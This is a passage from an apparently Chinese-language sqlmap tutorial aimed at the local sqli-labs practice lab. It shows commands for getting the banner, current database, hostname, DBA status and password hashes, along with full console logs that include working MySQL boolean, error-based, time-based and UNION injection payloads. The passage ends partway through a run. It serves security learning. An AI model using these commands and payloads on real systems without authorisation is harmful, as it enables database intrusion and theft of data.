文章目录
- 一、sqlmap检索DBMS信息
- 二、sqlmap枚举信息
- 1.sqlmap列举数据库名
- 2.sqlmap枚举数据库表
- 3.sqlmap枚举数据表列
- 4.sqlmap枚举数据值
- 5.sqlmap枚举schema信息
- 6.sqlmap检索数据表数量
- 7.sqlmap截取数据信息
- 8.sqlmap设置条件获取信息
- 9.sqlmap暴力破解数据
- 10.sqlmap检索所有信息
- 三、SQL注入原理
- 四、浏览器hackbar插件安装
- 五、SQL注入
一、sqlmap检索DBMS信息
1.sqlmap检索DBMS banner
参数:
--banner或者-b
获取后端数据库banner信息。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --banner
打印
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 07:59:39 /2020-03-02/
[07:59:40] [INFO] testing connection to the target URL
[07:59:40] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:59:40] [INFO] testing if the target URL content is stable
[07:59:41] [INFO] target URL content is stable
[07:59:41] [INFO] testing if GET parameter 'id' is dynamic
[07:59:41] [INFO] GET parameter 'id' appears to be dynamic
[07:59:41] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[07:59:41] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[07:59:41] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[07:59:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:59:47] [WARNING] reflective value(s) found and filtering out
[07:59:47] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[07:59:47] [INFO] testing 'Generic inline queries'
[07:59:47] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[07:59:47] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[07:59:47] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[07:59:47] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[07:59:47] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[07:59:47] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[07:59:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[07:59:47] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[07:59:47] [INFO] testing 'MySQL inline queries'
[07:59:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[07:59:47] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[07:59:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[07:59:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[07:59:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[07:59:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[07:59:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[07:59:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:59:58] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[07:59:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:59:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:59:58] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[07:59:58] [INFO] target URL appears to have 3 columns in query
[07:59:58] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1677=1677 AND 'TzaH'='TzaH
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 1079 FROM(SELECT COUNT(*),CONCAT(0x71706a6a71,(SELECT (ELT(1079=1079,1))),0x716a707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'sFVr'='sFVr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 3298 FROM (SELECT(SLEEP(5)))VyAw) AND 'thOf'='thOf
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8780' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x466d6c5a6c706d6e6f575a514d446469445872776c4977674c4b727a4f6557744272736173736274,0x716a707171)-- -
---
[08:00:29] [INFO] the back-end DBMS is MySQL
[08:00:29] [INFO] fetching banner
[08:00:30] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[08:00:30] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:00:30 /2020-03-02/
显示后端DBMS是MySQL,版本为5.7.26,--banner信息为数据库版本等基本信息。
2.sqlmap检索DBMS当前数据库
参数:
--current-db
获取当前数据库名。
sqli用的数据库是security,进行测试验证:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-db
打印
___
__H__
___ ___[,]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:05:30 /2020-03-02/
[08:05:31] [INFO] testing connection to the target URL
[08:05:31] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:05:31] [INFO] testing if the target URL content is stable
[08:05:31] [INFO] target URL content is stable
[08:05:31] [INFO] testing if GET parameter 'id' is dynamic
[08:05:31] [INFO] GET parameter 'id' appears to be dynamic
[08:05:31] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[08:05:31] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[08:05:31] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[08:05:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:05:33] [WARNING] reflective value(s) found and filtering out
[08:05:34] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[08:05:34] [INFO] testing 'Generic inline queries'
[08:05:34] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:05:34] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:05:34] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:05:34] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:05:34] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[08:05:34] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[08:05:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:05:34] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[08:05:34] [INFO] testing 'MySQL inline queries'
[08:05:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[08:05:34] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[08:05:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[08:05:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[08:05:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[08:05:34] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[08:05:34] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:05:34] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:05:44] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[08:05:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:05:44] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:05:44] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[08:05:44] [INFO] target URL appears to have 3 columns in query
[08:05:44] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1645=1645 AND 'gLeh'='gLeh
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 5033 FROM(SELECT COUNT(*),CONCAT(0x7162707171,(SELECT (ELT(5033=5033,1))),0x717a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'prKI'='prKI
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 4986 FROM (SELECT(SLEEP(5)))JzND) AND 'MonR'='MonR
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-2369' UNION ALL SELECT NULL,NULL,CONCAT(0x7162707171,0x786d7141526c7542417379654d4d56465a7276617a52754e766b514779656d5a51677a566e784b6f,0x717a7a6271)-- -
---
[08:05:46] [INFO] the back-end DBMS is MySQL
[08:05:46] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[08:05:46] [INFO] fetching current database
current database: 'security'
[08:05:46] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:05:46 /2020-03-02/
显示当前数据库为security。
加入--batch参数可以使所有选项都为默认选项:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --current-db --batch
打印
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all appli
cable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:08:24 /2020-03-02/
[08:08:24] [INFO] testing connection to the target URL
[08:08:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:08:24] [INFO] testing if the target URL content is stable
[08:08:25] [INFO] target URL content is stable
[08:08:25] [INFO] testing if GET parameter 'id' is dynamic
[08:08:25] [INFO] GET parameter 'id' appears to be dynamic
[08:08:25] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[08:08:25] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[08:08:25] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[08:08:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:08:25] [WARNING] reflective value(s) found and filtering out
[08:08:25] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[08:08:25] [INFO] testing 'Generic inline queries'
[08:08:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:08:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:08:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:08:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:08:25] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[08:08:25] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[08:08:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:08:26] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[08:08:26] [INFO] testing 'MySQL inline queries'
[08:08:26] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[08:08:26] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[08:08:26] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[08:08:26] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[08:08:26] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[08:08:26] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[08:08:26] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:08:26] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:08:36] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[08:08:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:08:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:08:36] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically e
xtending the range for current UNION query injection technique test
[08:08:36] [INFO] target URL appears to have 3 columns in query
[08:08:36] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9283=9283 AND 'AIxZ'='AIxZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3076 FROM(SELECT COUNT(*),CONCAT(0x71716a7171,(SELECT (ELT(3076=3076,1))),0x7176627671,FLOOR(RAND(0)*2))x FROM INFORMATION_
SCHEMA.PLUGINS GROUP BY x)a) AND 'gPam'='gPam
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 5610 FROM (SELECT(SLEEP(5)))XQPi) AND 'htpv'='htpv
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8412' UNION ALL SELECT NULL,CONCAT(0x71716a7171,0x4e5372724d6664566561576e72696e5a786c45746d6272656d4672555a4d53645164444a516b424f,0x7176
627671),NULL-- -
---
[08:08:36] [INFO] the back-end DBMS is MySQL
[08:08:36] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[08:08:36] [INFO] fetching current database
current database: 'security'
[08:08:36] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:08:36 /2020-03-02/
3.sqlmap检索DBMS当前主机名
参数:
--hostname
获取主机名。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --hostname
打印
___
__H__
___ ___[(]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:10:10 /2020-03-02/
[08:10:10] [INFO] testing connection to the target URL
[08:10:10] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:10:10] [INFO] testing if the target URL content is stable
[08:10:11] [INFO] target URL content is stable
[08:10:11] [INFO] testing if GET parameter 'id' is dynamic
[08:10:11] [INFO] GET parameter 'id' appears to be dynamic
[08:10:11] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[08:10:11] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[08:10:11] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[08:10:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:10:15] [WARNING] reflective value(s) found and filtering out
[08:10:15] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[08:10:15] [INFO] testing 'Generic inline queries'
[08:10:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:10:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:10:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:10:16] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:10:16] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[08:10:16] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[08:10:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:10:16] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[08:10:16] [INFO] testing 'MySQL inline queries'
[08:10:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[08:10:16] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[08:10:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[08:10:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[08:10:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[08:10:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[08:10:16] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:10:16] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:10:26] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[08:10:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:10:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:10:26] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[08:10:26] [INFO] target URL appears to have 3 columns in query
[08:10:26] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 8829=8829 AND 'CItZ'='CItZ
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 6534 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(6534=6534,1))),0x71716a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tjcT'='tjcT
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6137 FROM (SELECT(SLEEP(5)))letJ) AND 'jYdS'='jYdS
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8869' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6b7071,0x777343746755676f4b4974717474594e46587845486261664a52736a75594c6b54474e6b69555659,0x71716a6271)-- -
---
[08:11:14] [INFO] the back-end DBMS is MySQL
[08:11:14] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[08:11:14] [INFO] fetching server hostname
hostname: 'LAPTOP-61GNXXXX'
[08:11:14] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:11:14 /2020-03-02/
显示主机名为LAPTOP-61GNXXXX。
4.sqlmap检索DBMS用户信息
sqlmap探测当前用户是否是DBA
参数:
--is-dba
探测当前用户是否是数据库管理员。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --is-dba
打印
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:14:43 /2020-03-02/
[08:14:43] [INFO] testing connection to the target URL
[08:14:43] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:14:43] [INFO] testing if the target URL content is stable
[08:14:44] [INFO] target URL content is stable
[08:14:44] [INFO] testing if GET parameter 'id' is dynamic
[08:14:44] [INFO] GET parameter 'id' appears to be dynamic
[08:14:44] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[08:14:44] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[08:14:44] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[08:14:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:14:46] [WARNING] reflective value(s) found and filtering out
[08:14:46] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[08:14:46] [INFO] testing 'Generic inline queries'
[08:14:47] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:14:47] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:14:47] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:14:47] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:14:47] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[08:14:47] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[08:14:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:14:47] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[08:14:47] [INFO] testing 'MySQL inline queries'
[08:14:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[08:14:47] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[08:14:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[08:14:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[08:14:47] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[08:14:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[08:14:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:14:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:14:57] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[08:14:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:14:57] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:14:57] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[08:14:57] [INFO] target URL appears to have 3 columns in query
[08:14:57] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 3197 FROM(SELECT COUNT(*),CONCAT(0x7178716a71,(SELECT (ELT(3197=3197,1))),0x71786a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OKvt'='OKvt
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 7043 FROM (SELECT(SLEEP(5)))bunr) AND 'kqMl'='kqMl
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-5250' UNION ALL SELECT NULL,NULL,CONCAT(0x7178716a71,0x5953556e50546e68664e6b69504356704b4b764a704759624e794e4c5a71584c56624547576b5a66,0x71786a7071)-- -
---
[08:15:00] [INFO] the back-end DBMS is MySQL
[08:15:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[08:15:00] [INFO] testing if current user is DBA
[08:15:00] [INFO] fetching current user
current user is DBA: True
[08:15:00] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 08:15:00 /2020-03-02/
显示当前用户是DBA为True,因为当前用户为root,具有管理员权限。
sqlmap枚举DBMS用户密码
参数:
--passwords
Sqlmap会先列举用户,再列举用户密码Hash值。
该功能稍微有点鸡肋。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --password
打印
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 08:19:41 /2020-03-02/
[08:19:42] [INFO] resuming back-end DBMS 'mysql'
[08:19:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 2962=2962 AND 'UWCI'='UWCI
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
